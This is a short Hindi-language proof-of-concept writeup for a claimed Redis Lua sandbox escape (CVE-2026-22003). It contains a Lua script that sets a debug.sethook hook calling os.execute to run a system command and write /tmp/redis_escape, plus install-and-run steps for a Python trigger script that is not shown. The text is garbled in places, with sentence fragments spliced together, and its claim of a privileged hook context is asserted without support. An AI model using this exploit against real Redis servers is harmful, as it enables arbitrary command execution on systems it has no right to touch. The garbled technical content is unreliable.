
CVE-2026-22003 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो debug.sethook के माध्यम से Redis Lua सैंडबॉक्स से बचकर मनमाने सिस्टम कमांड निष्पादित करने का प्रदर्शन करता है।
debug.sethook के माध्यम से Redis Lua सैंडबॉक्स एस्केप-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
debug.sethook(function()
-- This hook runs in a privileged context
os.execute("id > /tmp/redis_escape")
end, "r")
local a = 1
end
return escape()
Redis Lua सैंडबॉक्स debug.sethook फ़ंक्शन को ठीक से अक्षम नहीं करता है। एक हमलावर जो Lua स्क्रिप्ट चला सकता है, एक हुक स्थापित कर सकता है जो विशेषाधिकार प्राप्त संदर्भ में निष्पादित होता है और सैंडबॉक्स से बाहर निकलकर मनमाना सिस्टम कमांड निष्पादित कर सकता है।
os.execute या समान फ़ंक्शन को कॉल कर सकते हैं।EVAL की अनुमति देता है)।pip install redis
python trigger_redis_sandbox_escape.py
/tmp/redis_escape फ़ाइल बन जाती है, जो कमांड निष्पादन को सिद्ध करती है।